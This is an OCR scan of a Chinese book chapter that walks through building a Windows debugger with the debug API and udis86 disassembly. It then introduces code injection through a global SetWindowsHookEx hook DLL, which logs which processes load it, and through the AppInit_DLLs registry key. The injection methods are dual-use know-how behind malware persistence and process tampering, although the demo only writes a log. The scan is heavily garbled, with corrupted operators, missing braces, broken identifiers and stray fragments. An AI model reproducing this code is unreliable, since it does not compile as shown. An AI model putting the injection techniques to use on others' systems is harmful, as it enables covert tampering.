首先 让 我 们 来 亲手 制作 一 个 简单 的 调试 器 ， 通 过 实践 来 学 习 一 些 基 


岂 许 大 家 会 问 :“ 市 面 上 有 那么 多 功能 强大 的 调试 器 ， 有 必要 自 
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四 则 


运算 。 这 是 因为 ， 尽 管 我 们 有 计算 器 这 个 很 好 的 工具 ， 但 对 于 其 内 部 的 





原理 还 是 需要 了 解 的 。 


当然 ， 小 学 不 会 教学 生 们 如 何 制 作 计算 器 ， 但 有 一 点 是 相同 的 ， 那 
就 是 对 于 自己 所 使 用 的 工具 ， 最 好 能 够 了 解 其 工作 原理 。 为 此 ， 我 认为 


























“亲手 做 一 个 简易 版 ”是 一 个 很 好 的 方法 。 即 便 是 重新 发 明 轮 子 ， 又 何 


尝 不 可 呢 ? 当 然 , 我 们 的 目的 是 学 习 和 加 深 理解 ， 如 果 你 要 制作 一 个 可 


以 媲美 OllyDbg Fl WinDbg 的 真正 的 调试 器 ， 那 又 是 另 一 码 事 了 。 


是 学 学 


而 且 ， 比 起 在 计算 顺 上 按 数字 然后 看 结果 来 说 ， 
更 有 趣 吧 ? 








还 


四 则 运算 





计算 器 也 好 ,计算 机 也 好 ， 它 们 都 是 为 了 高 效 达成 某 种 目的 而 使 用 
的 工具 ， 使 用 工具 并 不 一 定 会 让 工作 变 得 有 趣 ， 但 制作 一 种 工具 毫 无 疑 





























问 将 会 为 你 带 来 很 多 乐趣 。 





4.1.2 调试 器 到 底 是 怎样 工作 的 











S 











wdbg01a )。 


写 调 试 器 有 点 像 写 八股 文 ， 只 要 记 住 一 些 固 定 规则 就 很 容易 理解 了 。 
我 们 先 来 看 一 段 最 简单 的 调试 器 代码 ( 源 代码 见 chap04\wdbg01a\ 
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V wdbg01a.cpp 


#include "stdafx.h" 


int tmain(int argc,  TCHAR* argv[]) 
{ 
PROCESS INFORMATION pi; 
STARTUPINFO si; 


if(argc < 2){ 
fprintf(stderr, "C:\\>%s <sample.exe>\n", argv[0]); 


return 1; 


memset (&pi, 0, sizeof (pi)); 
memset (&si, 0, sizeof(si)); 
si.cb = sizeof (STARTUPINFO) ; 


BOOL r = CreateProcess ( 
NULL, argv[1], NULL, NULL, FALSE, 
NORMAL PRIORITY CLASS | CREATE SUSPENDED | DEBUG PROCESS, 
NULL, NULL, &si, &pi); 

TENTEI 


return -1; 
ResumeThread (pi.hThread); 


while(1) { 
DEBUG EVENT de; 
if(!WaitForDebugEvent(&de, INFINITE)) 


break; 
DWORD dwContinueStatus - DBG CONTINUE; 


switch (de.dwDebugEvent Code) 

{ 

case CREATE PROCESS DEBUG EVENT: 
printf ("CREATE PROCESS DEBUG EVENT\n") ; 
break; 

case CREATE THREAD DEBUG EVENT: 
printf ("CREATE THREAD DEBUG EVENT\n") ; 


break; 














4.4 通过 自制 调试 器 来 理解 其 原理 


























case EXIT THREAD DEBUG EVENT: 
printf ("EXIT THREAD DEBUG EVENT n"); 
break; 

case EXIT PROCESS DEBUG EVENT: 
printf ("EXIT PROCESS DEBUG EVENT n"); 
break; 

case EXCEPTION DEBUG EVENT: 
DWORD r - de.u.Exception.ExceptionRecord. 


ExceptionCode; 


if(r !- EXCEPTION BREAKPOINT) 


dwContinueStatus - DBG EXCEPTION NOT HANDLED; 


printf("EXCEPTION DEBUG EVENT n"); 
break; 

case OUTPUT DEBUG STRING EVENT: 
printf ("OUTPUT DEBUG STRING EVENT n"); 
break; 

case RIP EVENT: 

printf("RIP EVENT n"); 
break; 

case LOAD DLL DEBUG EVENT: 

printf ("LOAD DLL DEBUG EVENT An"); 
break; 

case UNLOAD DLL DEBUG EVENT: 
printf("UNLOAD DLL DEBUG EVENT n"); 
break; 





} 
if (de.dwDebugEventCode == EXIT PROCESS DEBUG EVENT) 
break; 





Cont inueDebugEvent ( 


de.dwProcessId, de.dwThreadId, dwContinueStatus) ; 


CloseHandle (pi.hThread); 
CloseHandle (pi.hProcess); 


return 0; 





程 也 叫 j 





周 试 对 象 或 者 被 调试 程序 ( debuggee )。 




















调 

















143 


首先 ， 程 序 通 过 CreateProcess 函数 启动 调试 目标 进程 。 调 试 目 标 进 


] CreateProcess 图 数 时 ， 如 果 设 置 了 DEBUG PROCESS 或 
DEBUG ONLY THIS PROCESS 标志 ， 则 启动 的 进程 ( 调试 对 象 ) 4 


L 
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所 产生 的 异常 都 会 被 调试 器 捕捉 到 。 
上 述 两 个 标志 的 区 别 如 下 。 





。DEBUG_PROCESS 标志 
调试 对 象 所 产生 的 子 进程 ， 以 及 子 进程 的 子 进 程 都 作为 调试 对 象 
* DEBUG ONLY THIS PROCESS 
只 将 通过 CreateProcess 启动 的 那 一 个 进程 作为 调试 对 象 





CreateProcess 函数 的 第 1 参数 或 者 第 2 参数 可 用 于 传递 目标 程序 的 
路 径 ， 然 后 便 可 启动 进程 。 











V CreateProcess 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms682425.aspx 
BOOL CreateProcess( 


LPCTSTR lpApplicationName, // 可 执行 模块 名 称 
LPTSTR lpCommandLine, // 命令 行 字符 串 





LPSECURITY ATTRIBUTES lpProcessAttributes, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 

















BOOL bInheritHandles, // 句柄 继承 选项 
DWORD dwCreationFlags, // 创建 标志 

LPVOID lpEnvironment, // 新 进程 的 环境 变量 块 
LPCTSTR lpCurrentDirectory, // 当前 路 径 
LPSTARTUPINFO lpStartupInfo, // 启动 信息 




















LPPROCESS INFORMATION lpProcessInformation // 进程 信息 




















通过 CREATE SUSPENDED 标志 可 以 让 进程 在 启动 后 进入 挂 起 状 
态 。 当 设置 这 一 标志 时 ，CreateProcess P Wk 用 完成 之 后 ， 新 进程 中 的 
所 有 线程 都 会 暂停 。 尽 管 程序 没有 在 运行 ， 但 程序 的 可 执行 文件 已 经 被 
载 人 内 存 ， rl ee 井 行 改写 。 

在 这 个 示例 程序 中 ,我们 没有 进行 任何 操作 而 是 直接 调用 了 
ResumeThread 函数 ， 这 时 调试 对 象 的 所 有 线程 就 会 恢复 运行 。 
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V ResumeThread Zi 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms685086 .aspx 
DWORD ResumeThread ( 

HANDLE hThread // 线程 句柄 
)g 

















pissed iban 运行 后 ， 调 试 器 就 开始 等 待 捕捉 异常 。 
调试 事件 会 通过 WaitForDebugEvent ph BOK VETT Be 





Y WaitForDebugEvent 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms681423.aspx 
BOOL WaitForDebugEvent ( 

// 保存 调试 事件 信息 的 结构 体 指针 

LPDEBUG EVENT lpDebugEvent, 

// 事件 等 待 时 间 ( 毫秒 ) 


DWORD dwMilliseconds 








WaitForDebugEvent 函数 的 第 1 参数 传递 了 一 个 DEBUG EVENT 4 
构 体 ， 捕 捉 到 的 调试 事件 会 被 存放 在 这 个 结构 体 中 ， 第 2 on 
dwMilliseconds 如 果 设 置 为 INFINITE 则 表示 一 直 等 待 。 

DEBUG EVENT 结构 体 的 定义 如 下 。 






































Y DEBUG_EVENT 结构 体 


// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679308 . aspx 
typedef struct  DEBUG EVENT ( 
DWORD dwDebugEventCode; 
DWORD dwProcessId; 
DWORD dwThreadId; 
union ( 
EXCEPTION DEBUG INFO Exception; 
CREATE THREAD DEBUG INFO CreateThread; 
CREATE PROCESS DEBUG INFO CreateProcessInfo; 
EXIT THREAD DEBUG INFO ExitThread; 
EXIT PROCESS DEBUG INFO ExitProcess; 
LOAD DLL DEBUG INFO LoadDll; 
UNLOAD DLL DEBUG INFO UnloadDll; 
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OUTPUT DEBUG STRING INFO DebugString; 
RIP INFO RipInfo; 
) u; 
) DEBUG EVENT, *LPDEBUG EVENT; 





其 中 第 一 个 成 员 dwDebugEventCode 代表 调试 事件 编号 。 

dwProcessId 为 进程 ID ，dwThreadId 为 线程 ID。 

接 下 来 的 数据 会 随 dwDebugEventCode 的 不 同 而 发 生变 化 。 
dwDebugEventCode 可 以 取 下 列 值 。 























调试 事件 含义 
EXCEPTION_DEBUG_EVENT 发 生 异 常 
CREATE_THREAD_DEBUG_EVENT 创建 线程 
CREATE PROCESS DEBUG EVENT 创建 进程 







































































EXIT_THREAD_DEBUG_EVENT 线程 结束 
EXIT_PROCESS_DEBUG_EVENT 进程 结束 

LOAD DLL DEBUG EVENT 加 载 DLL 
UNLOAD_DLL_DEBUG_EVENT EER DLL 
OUTPUT_DEBUG_STRING_EVENT 调用 OutputDebugString 函数 
RIP_EVENT 发 生 系统 调试 错误 




















wdbg01a.cpp 中 ， 当 接收 到 调试 事件 时 ， 会 使 用 printf 函数 将 事件 的 




















内 容 显示 出 来 。 通 过 访问 union 定义 的 结构 体 就 可 以 获取 调试 对 象 的 
信息 。 





当 处 理 被 交 给 调试 器 时 ， 调 试 对 象 会 暂停 运行 。 因此， 在 我 们 的 调 
试 器 显示 消息 的 过 程 中 ， 调 试 对 象 是 处 于 暂停 状态 的 。 

调用 ContinueDebugEvent 函数 可 以 让 调试 对 象 恢复 运行 ， 这 时 调试 
av X. EIEI] WatiForDebugEvent 函数 等 待 下 一 条 调试 事件 。 

下 面 让 我 们 运行 一 下 看 看 。 


























pun 














v 运行 示例 


C:\>wdbg0la.exe "C:\Program Files\Internet Explorer\ 7 


iexplore.exe" 
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- my EO- 安全 G) ~ 
































网 站 微软 官方 杀毒 (免费 ) CBE 
it Ed: EXIT THRE 

DLL. 

LL 





| 资讯 娱乐 时 尚 汽车 
| RE 博览 历史 BL 
科技 数码 Win8 App 

















^ 























RANA SB, UEH, AREA RMA. HIER DLL 等 事件 都 被 


IEEE ENS 


4.1.3 ”实现 反 汇 编 功 能 


下 面 让 我 们 为 wdbg0la.cpp 增加 一 些 新 功能 (chap04\wdbg02a' 


wdbg02a\wdbg02a.cpp )。 


我 们 希望 在 发 生 异 常 时 ， 能 够 显示 出 发 生 异 常 的 地 址 以 及 当前 寄存 





器 的 值 。 同 时 ， 我 们 还 希望 显示 发 生 异 常 时 所 执行 的 指令 ， 
们 来 实现 反 汇 编 功 能 。 








因此 下 面 我 


我 们 可 以 使 用 udis86 来 实现 反 汇 编 。 这 是 一 个 开源 的 反 汇 编 器 ， 源 
代码 发 布 在 GitHub 上 。 笔 者 fork 了 这 个 项 目 ， 并 用 Visual Studio 2010 














进 制 文件 的 话 可 以 下 载 这 个 编译 后 的 版 本 。 





进行 了 编译 ， 发 布 在 笔者 自己 的 GitHub 中 ， 如 果 只 需要 Windows 版 二 
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https://github.com/vmt/udis86 ( 原始 ) 
https://github.com/kenjiaiko/udis86 


Y wdbgO2a.cpp 


#include "stdafx.h" 


#include «Windows.h» 
#include "udis86.h" 


#pragma comment (lib, "libudis86.lib") 


int disas(unsigned char *buff, char *out, int size) 


{ 
uditi ud obi 
ud init(&ud obj); 
ud set input buffer(&ud obj, buff, 32); 


ud set mode(&ud obj, 32); 
ud set syntax(&ud obj, UD SYN INTEL); 
if(ud disassemble(&ud obj))[ 


sprintf s(out, size, "$14s %s", 
ud insn hex(&ud obj), ud insn asm(&ud obj)); 





Jeise( 
return ST 


return (int)ud insn len(&ud obj); 


int exception debug event (DEBUG EVENT *pde) 
DWORD dwReadBytes; 


HANDLE ph - OpenProcess( 
PROCESS VM WRITE | PROCESS VM READ | PROCESS VM OPERATION, 
FALSE, pde-»dwProcessId); 

if(!ph) 


return -1; 
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HANDLE th = OpenThread(THREAD GET CONTEXT | THREAD SET ? 


CONTEXT, 


FALSE, pde-»dwThreadIQd); 
rise (( ela) 
recurn -1; 


CONTEXT ctx; 
ctx.ContextFlags - CONTEXT ALL; 


GetThreadContext(th, &ctx); 


char asm string[256]; 
unsigned char asm code[32]; 


ReadProcessMemory (ph, (VOID *)ctx.Eip, asm code, 32, 7 


&dwReadBytes) ; 
if(disas(asm code, asm string, sizeof(asm string)) -- -1) 
asm string[0] = '\0'; 


int 


printf("Exception: $08x (PID:$d, TID:$d) Wn", 
pde-»u.Exception.ExceptionRecord.ExceptionAddress, 
pde-»dwProcessId, pde-»dwThreadId); 


printf(" %08x: %s\n", ctx.Eip, asm string); 

oreal (Lut Reg: EAX-$08x ECX=%08x EDX=%08x EBX=%08x\n", 
ctx, Bax, ctx.Ecx, Ctx.Edx, ctx.Ebx); 

oreabaler (ly ESI-$08x EDI=%08x ESP=%08x EBP=%08x\n", 


GER INL, Tole loli, CIE Io), eeN 


SetThreadContext (th, &ctx) ; 
CloseHandle (th) ; 
CloseHandle (ph) ; 

return 0; 


_tmain(int argc,  TCHAR* argv[]) 


STARTUPINFO si; 
PROCESS INFORMATION pi; 


if(arge < 2){ 
fprintf(stderr, "C:\\>%s <sample.exe>\n", argv[0]); 
return 1; 
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memset (&pi, 0, sizeof(pi)); 
memset (&si, 0, sizeof(si)); 
Si.cb = sizeof (STARTUPINFO) ; 


BOOL r = CreateProcess ( 
NULL, argv[1], NULL, NULL, FALSE, 
NORMAL PRIORITY CLASS | CREATE SUSPENDED | DEBUG PROCESS, 
NULL, NULL, &si, &pi); 
aE (E) 
return -1; 


ResumeThread (pi.hThread) ; 
int process! counter = 0; 


do( 
DEBUG EVENT de; 
if(!WaitForDebugEvent(&de, INFINITE)) 
break; 


DWORD dwContinueStatus - DBG CONTINUE; 


switch (de.dwDebugEvent Code) 

{ 

case CREATE PROCESS DEBUG EVENT: 
process counter++; 
break; 

case EXIT PROCESS DEBUG EVENT: 
process counter--; 
break; 

case EXCEPTION DEBUG EVENT: 
if (de.u.Exception.ExceptionRecord.ExceptionCode != 

EXCEPTION BREAKPOINT) 


dwContinueStatus = DBG EXCEPTION NOT HANDLED; 


} 


exception debug event (&de) ; 
break; 
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ContinueDebugEvent ( 
de.dwProcessId, de.dwThreadId, dwContinueStatus); 


)while(process counter > 0); 
CloseHandle (pi.hThread); 


CloseHandle (pi.hProcess); 
return 0; 





disas 函数 负责 对 机 器 语言 进行 反 汇 编 ， 在 这 里 我 们 使 用 了 udis86 
的 功能 。 

exception debug event 函数 会 在 发 生 异 常 时 运行 ， 其 中 调用 了 下 列 
函数 。 








4 


* OpenProcess 

e ReadProcessMemory 
e OpenThread 

* GetThreadContext 

e SetThreadContext 











上 面 这 些 函 数 ， 再 加 上 WriteProcessMemory 函数 ， 就 是 用 于 访问 其 
他 进程 的 必 备 工具 包 。 
在 Windows 中 ， 即 便 我 们 的 程序 不 是 作为 调试 器 挂 载 在 目标 进程 
， 只 要 能 够 获取 目标 进程 的 句柄 ， 就 可 以 随意 读 写 该 进程 的 内 存 空 
间 。 i. 当前 用 户 如 果 没 有 相应 的 权限 ， 调 用 OpenProcess 会 失败 ， 
但 只 要 能 人 够 通过 其 他 方法 获取 进程 句柄 ， 也 可 以 自由 读 写 该 进程 的 内 存 
空间 。 





















































Y OpenProcess 函数 


// https: //msdn.microsoft .com/en-us/library/windows/desktop/ms684320.aspx 
HANDLE OpenProcess( 
DWORD dwDesiredAccess, // 访问 标志 














152 | 第 4 章 自由 控制 程序 运行 方式 的 编程 技巧 























BOOL bInheritHandle, // 句柄 继承 选项 
DWORD dwProcessId // 进程 ID 

















在 exception debug event 函数 中 ,为 了 获取 发 生 异 常 时 所 执行 的 指 
令 ， 我 们 需要 使 用 ReadProcessMemory 函数 。 


Y ReadProcessMemory 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms680553.aspx 
BOOL ReadProcessMemory ( 
































HANDLE hProcess, // 进程 句柄 

LPCVOID lpBaseAddress, // 读 取 起 始 地 址 
LPVOID lpBuffer, // 存放 数据 的 缓冲 区 
DWORD nSize, // 要 读 取 的 字 节 数 








LPDWORD lpNumberOfBytesRead // 实际 读 取 的 字 节 数 


Y WriteProcessMemory 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms681674.aspx 
BOOL WriteProcessMemory ( 

















HANDLE hProcess, // 进程 句柄 
LPVOID lpBaseAddress, // 写 入 起 始 地 址 
LPVOID lpBuffer, // 数据 缓冲 区 
DWORD nSize, // 要 写 入 的 字 节 数 





LPDWORD lpNumberOfBytesWritten // 实际 写 入 的 字 节 数 





接 下 来 是 对 寄存 器 的 读 写 。 

用 OpenThread 打开 线程 之 后 ， 可 通过 GetThreadContext 和 
SetThreadContext 来 读 写 寄存 器 。 
由 于 我 们 不 需要 在 exception debug event 中 改写 寄存 器 的 值 ， 因 此 
不 需要 调用 SetThreadContext P 不 过 为 了 方便 今后 增加 改写 寄存 器 
的 功能 ， 我 们 还 是 保留 了 对 这 个 函数 的 调用 。 
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Y OpenThread 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms684335.aspx 
HANDLE OpenThread( 

DWORD dwDesiredAccess,// 访问 标志 

BOOL bInheritHandle, // 句柄 继承 选项 

DWORD dwThreadId // 线程 ID 


Y GetThreadContext 函数 


// https: //msdn.microsoft.com/en-us/library/windows/desktop/ms679362.aspx 
BOOL GetThreadContext ( 

HANDLE hThread, // 拥有 上 下 文 的 线程 句柄 

LPCONTEXT lpContext // 接收 上 下 文 的 结构 体 地 址 





DES 


V SetThreadContext 


// https: //msdn.microsoft .com/en-us/library/windows/desktop/ms680632.aspx 
BOOL SetThreadContext ( 

HANDLE hThread, // 拥有 上 下 文 的 线程 句柄 

CONST CONTEXT *lpContext // 存放 上 下 文 的 结构 体 地 址 





)g 





使 用 这 些 API 函数 就 可 以 任意 干预 其 





RE 
HB 


4.1.4 运行 改良 版 调试 器 


下 面 我 们 来 运行 一 下 wdbg02a.exe (示例 文件 见 chap04\wdbg02a\ 
Release ), 
首先 ， 我 们 准备 一 个 会 发 生 异 常 的 程序 ( 源 代码 见 chap04\wdbg02a\ 
Release\test.exe )， 然 后 将 这 个 程序 作为 参数 来 运行 wdbg02a.exe。 























V test.cpp 


int main(int argc, char *argv[]) 


{ 
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char *s - NULL; 
*g = OxEE; 


return 0; 


v 运行 示例 


C:\>wdbg02a.exe test.exe 
Exception: 773a0fab (PID:7008, TID:8068) 
773a0fac: 8975fc mov [ebp-0x4], esi 
Reg: EAX=00000000 ECX=3e400000 EDX=0027e188 EBX=00000000 
ESI-fffffffe EDI=00000000 ESP=003efa78 EBP-003efaa4 7 
Exception: 013b1002 (PID:7008, TID:8068) 
013b1002: c600ff mov byte [eax], Oxff 
Reg: EAX=00000000 ECX=71f£b4714 EDX-00000000 EBX=00000000 
ESI-00000001 EDI=013b36b8 ESP=003efeb8 EBP=003efef8 





我 们 可 以 看 到 在 mov byte [eax], Oxff 的 地 方 改 生 了 第 2 个 异常 ， 这 
里 对 应 源 代码 中 的 *s = OxFE; 这 一 行 。 看 来 运行 成 功 了 。 
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42 在 其 他 进程 中 运行 任意 代码 : 
代码 注入 


4.2.1 向 其 他 进程 注入 代码 

在 其 他 进程 中 运行 任意 代码 的 手法 ,统称 为 代码 注入 (code 
injection )。 在 使 用 DLL 的 情况 下 ， 一般 叫 作 “DLL A”, 但 “在 其 他 
进程 中 运行 自己 的 代码 ”这 一 点 是 共通 的 。 

代码 注入 和 DLL 注入 有 很 多 用 途 ， 其 中 也 是 有 好 有 坏 。 

关于 DLL 注入 ， 有 一 篇 著名 的 文章 叫 作 “Three Ways to Inject Your 
Code into Another Process" 。 




















e Three Ways to Inject Your Code into Another Process 
http://www.codeproject.com/Articles/4610/Three- Ways-to-Inject- 


Your-Code-into-Another-Process 














这 篇 文章 中 列举 了 三 种 方法 ， 其 实现 在 又 出 现 了 一 些 其 他 的 方法 ， 
看 我 们 来 介绍 其 中 的 几 个 。 











下 











4.2. ”用 SetWindowsHookEx 劫持 系统 消息 
下 面 三 个 API 函数 ， 我 们 就 可 以 劫持 系统 消息 














e SetWindowsHookEx 
e CallNextHookEx 
e UnhookWindowsHookEx 





这 些 函 数 都 是 Windows 的 官方 API， 可 以 用 于 单个 线程 ， 也 可 以 














156 | 第 4 自由 控制 程序 运行 方式 的 编程 技巧 























V SetWindowsHookEx 


HHOOK SetWindowsHookEx ( 





int idHook, // 钩子 类 型 
HOOKPROC lpfn, // 钩子 过 程 
HINSTANCE hMod, // 应 用 程序 实例 的 句柄 

















DWORD dwThreadId // 线程 ID 


V CallNextHookEx 


LRESULT CallNextHookEx( 





HHOOK hhk, // 当前 钩子 的 句柄 

int nCode, // 传递 给 钩子 过 程 的 代码 
WPARAM wParam, // 传递 给 钧 子 过 程 的 值 
LPARAM lParam // 传递 给 钧 子 过 程 的 值 


Y UnhookWindowsHookEx 


BOOL UnhookWindowsHookEx ( 
HHOOK hhk // 要 解除 的 对 象 的 钩子 过 程 句柄 
Ni 





下 面 我 们 来 试 一 下 SetWindowsHookEx (W {0 fij Jl chap04\ 


writeappinit\loging )。 











Y loging.h 


#ifdef LOGING EXPORTS 

#define LOGING API extern "C" — declspec (dllexport) 
#else 

#define LOGING API extern "C" __declspec(dllimport) 
#endif 


LOGING API int CallSetWindowsHookEx (VOID); 
LOGING API int CallUnhookWindowsHookEx (VOID); 
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V loging.cpp 


#include "stdafx.h" 
#include "loging.h" 


HHOOK g_hhook = NULL; 


static LRESULT WINAPI GetMsgProc(int code, WPARAM wParam, LPARAM 
1Param) 


{ 


return (CallNextHookEx (NULL, code, wParam, lParam) ) ; 


LOGING API int CallSetWindowsHookEx (VOID) 


{ 
if (g_hhook != NULL) 
return -1; 


MEMORY BASIC INFORMATION mbi; 

if(VirtualQuery(CallSetWindowsHookEx, &mbi, sizeof(mbi)) -- 0) 
return = 

HMODULE hModule = (HMODULE) mbi.AllocationBase; 


g hhook = SetWindowsHookEx ( 

WH GETMESSAGE, GetMsgProc, hModule, 0); 
if(g hhook -- NULL) 

return =l; 


return 0; 


LOGING_API int CallUnhookWindowsHookEx (VOID) 


{ 
if(g hhook == NULL) 
return =i; 


UnhookWindowsHookEx (g_hhook) ; 
g_hhook = NULL; 
return 0; 








SetWindowsHookEx 的 功能 是 将 原本 传递 给 窗口 过 程 的 消息 劫持 下 


来 ， 


传递 
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交 给 第 2 参数 中 所 指定 的 函数 来 进行 处 理 。 











GetMsgProc 中 调用 了 CallNextHookEx PAX, 


给 下 一 个 钩子 过 程 。 
这 些 API 是 用 来 劫持 消息 的 ， 但 如 果 要 劫持 其 他 进程 的 窗口 过 程 消 





d 
E, 














那么 就 需要 “在 其 他 进程 中 ”加 载 我 们 的 DLL。 

















参照 下 面 的 代码 ,我们 可 以 将 loging.cpp Zhi 





loging.cpp 中 ， 我 们 将 GetMsgProc 设 为 钧 子 过 程 ， 因 此 系统 消息 在 


给 目标 线程 原 有 的 窗口 过 程 之 前 ， 会 先 由 GetMsgProc 来 进行 处 理 。 








这 时 消息 会 继续 传递 























对 成 DLL ( 源 代码 见 


chap04\writeappinit\loging )， 然 后 调用 SetWindowsHookEx， 将 其 第 4 参 


数 ( dwThreadId ) 设 为 0。 
线程 应 


用 钧 子 ， 也 就 是 让 这 些 进程 加 载 我 们 的 DLL. 


V dlimain.cpp 


#include "stdafx.h" 


int WriteLog(TCHAR *szData) 


{ 


TCHAR szTempPath[1024]; 
GetTempPath(sizeof(szTempPath), szTempPath); 
lstrcat(szTempPath, "loging.log"); 


TCHAR szModuleName [1024]; 
GetModuleFileName (GetModuleHandle (NULL), 
szModuleName, sizeof (szModuleName)); 


TCHAR szHead [1024] ; 
wsprintf(szHead, "[PID:%d] [Module:%s] ", 
GetCurrent ProcessId(), szModuleName) ; 


HANDLE hFile = CreateFile( 
szTempPath, GENERIC WRITE, 0, NULL, 


if (hFile == INVALID HANDLE VALUE) 


return -1; 





SetFilePointer(hFile, 0, NULL, FILE END); 








这 样 ， 我 们 就 可 以 对 持 有 窗口 过 程 的 进程 和 











OPEN ALWAYS, FILE ATTRIBUTE NORMAL, NULL); 
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DWORD dwWriteSize; 
WriteFile(hFile, szHead, lstrlen(szHead), &dwWriteSize 


, NULL); 


WriteFile(hFile, szData, lstrlen(szData), &dwWriteSize, NULL); 


CloseHandle (hFile); 


return 07 


BOOL APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 


switch (ul reason for call) 


case DLL PROCESS ATTACH: 
WriteLog("DLL PROCESS ATTACH\n") ; 
break; 
case DLL THREAD ATTACH: 
break; 
case DLL THREAD DETACH: 
break; 
case DLL PROCESS DETACH: 
WriteLog("DLL PROCESS DETACH\n") ; 


break; 

















} 


return TRUE; 








下 面 我 们 向 dllmain.cpp 中 添加 一 些 代 码 ， 使 得 在 DLL 成 功 加 载 之 
后 ， 向 %TEMP% 目录 输出 一 个 名 为 loging.log 的 日 志文 件 。 日 志 的 内 














容 包括 进程 ID 和 模块 路 径 。 


将 dllmain.cpp loging.cpp 和 1loging.h 进行 编译 ， 然 后 我 们 编写 另 一 
个 程序 ， 加 载 这 个 DLL 并 调用 CallSetWindowsHookEx ( 源 代码 见 








chap04\writeappinit\setwindowshook )。 
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V setwindowshook.cpp 


#include "stdafx.h" 
#include <Windows.h> 


int _tmain(int argc,  TCHAR* argyll) 
{ 
if(arge < 2){ 
fprintf(stderr, "$s «DLL Name>\n", argv[0]); 


return 1; 


HMODULE h = LoadLibrary (argv[1]); 
if(h == NULL) 
return -1; 


ine Sieleen dl eos cad (VOD) ¢ 

fcall = (int (WINAPI *) (VOID) ) 
GetProcAddress(h, "CallSetWindowsHookEx") ; 

if(fcall == NULL) { 
fprintf(stderr, "ERROR: GetProcAddress\n") ; 
goto _Exit; 


eye ((__Bhetelee ull eneses) (On); 
ffree = (int (WINAPI *) (VOID) ) 
GetProcAddress(h, "CallUnhookWindowsHookEx") ; 
if (ffree == NULL) { 
fprintf(stderr, "ERROR: GetProcAddress n"); 
goto Exit; 


if(fcall()( 
fprintf(stderr, "ERROR: CallSetWindowsHookEx n"); 
goto Exit; 


) 
printf("Call SetWindowsHookEx Wn"); 


getchar(); 


if (ffree() ) { 
fprintf(stderr, "ERROR: CallUnhookWindowsHookEx\n") ; 
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goto Exit; 


} 


printf ("Call UnhookWindowsHookEx\n") ; 


ale E 
FreeLibrary (h) ; 


recurn 0; 


v 运行 示例 


C:\>setwindowshook.exe loging.dll 
Call SetWindowsHookEx 


B loging. log - 写字 板 
EFO 编辑 多) SEW MAG dax Hea 
DG BH SR Mm toe B® 


|[PID: 936] (Module:C: \M\setwindowshook. exe] DLL PROCESS ATTACH 
[PID: 756] [Module:C: \WINDOWS\Explorer. EXE] DLL PROCESS ATTACH 
[PID: 3464] [Module:C: \WINDOWS\ syst em32\¥BoxTray. exe] DLL PROCESS ATTACH 
[PID: 204] [Module:C: \WINDOWS\ syst em32\CTFMON. EXE] DLL PROCESS ATTACH 
PID: 3720] [Module:C: \WINDOWS\ syst em32\conime. exe] DLL PROCESS ATTACH 
PID: 740] [Module:C:XProgram Files\Common Files\Java\Java Update\jucheck. exe] DLL PROCESS ATTACH 
PID: 2632] [Module:C: \WINDOWS\ syst em32\ NOTEPAD. EXE] DLL PROCESS ATTACH 
PID: 2632] [Module:C: \WINDOWS\ syst em32\ NOTEPAD. EXE] DLL PROCESS DETACH 
iC: 
iC: 





PID:4008][Module:C: \WINDOWS\system32\rund1132. exe] DLL PROCESS ATTACH 

PID:2464] [Module:C:\Program Files\Windows NT\Accessories\WORDPAD. EXE] DLL PROCESS ATTACH 
[PID:4008] [Module:C: \WINDOWS\ syst em32\rund1132. exe] DLL PROCESS DETACH 

[PID:2464] [Module:C:\Program Files\Windows NT\Accessories\WORDPAD. EXE] DLL PROCESS DETACH 
[PID:2132] [Module:C:\Program Files\Windows NT\Accessories\WORDPAD. EXE] DLL PROCESS ATTACH 
[PID:2132] [Module:C:\Program Files\Windows NT\Accessories\WORDPAD. EXE] DLL PROCESS DETACH 
PID:2532] [Module:C:XProgram Files\Windows Media Player\setup_wm. exe] DLL PROCESS ATTACH 
PID:2532] [Module:C:XProgram Files\Windows Media Player\setup_wm. exe] DLL PROCESS DETACH 
PID:916] [Module:C:XProgram Files\Windows NT\Accessories\WORDPAD. EXE] DLL PROCESS ATTACH 
PID: 936] [Module:C: \M\setwindowshook. exe] DLL PROCESS DETACH 

PID:756][Module:C: \WINDOWS\Explorer. EXE] DLL PROCESS DETACH 













打开 C:\Documents and Settings\Campers\Local Settings TempMoging. 
log 文件 ， 我 们 可 以 查看 加 载 DLL 的 日 志 (Windows Vista 及 以 上 版 本 的 
系统 中 ， 这 个 文件 位 于 C:\Users\ 用 户 名 \AppData\Local\Temp\loging. 
log )。 我 们 可 以 看 到 ， 其 他 进程 已 经 加 载 了 loging.dll。 
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4.2.3 将 DLL 路 径 配置 到 注册 表 的 Applnit DLLs 项 


SetWindowsHookEx 可 以 在 调用 时 将 DLL 映射 到 其 他 进程 中 ， 不 过 
如 果 我 们 将 DLL 的 路 径 配置 在 注册 表 的 AppInit_DLLs 项 中 ， 就 可 以 在 
系统 启动 时 将 任意 DLL 加 载 到 其 他 进程 中 。 

运行 regedit， 找 到 下 面 的 路 径 。 





























HKEY LOCAL MACHINE 
SOFTWARE \ 
Microsoft \ 
Windows NT\ 
CurrentVersion\ 
Windows \ 
AppInit_DLLs 在 这 里 填写 DLL 路 径 ， 以 逗号 分 


LoadAppInit DLLs |AppInit DLLs 启 用 /禁用 标志 





E 




































































Windows XP 中 没有 LoadApplnit DLLs 这 一 项 。 

此 外 ,在 Windows 7 中 ， 多 了 一 个 叫 作 RequireSignedAppInit DLLs 
的 项 ， 这 一 项 代表 只 允许 加 载 经 过 签名 的 DLL. 

关于 Applnit DLLs 的 详细 信息 请 参见 MSDN 的 相关 网 页 。 


* Applnit DLLs in Windows 7 and Windows Server 2008 R2 
https://msdn.microsoft.com/en-us/library/dd744762.aspx 





在 64 位 系统 中 ， 关 于 32 位 程序 的 相关 设 定 已 被 重 定 向 到 
Wow6432Node 中 。 





HKEY LOCAL MACHINE\ 
SOFTWARE 
Wow6432Node\ 
Microsoft\ 
Windows NT\ 
C 


urrentVersion\ 





Windows \ 
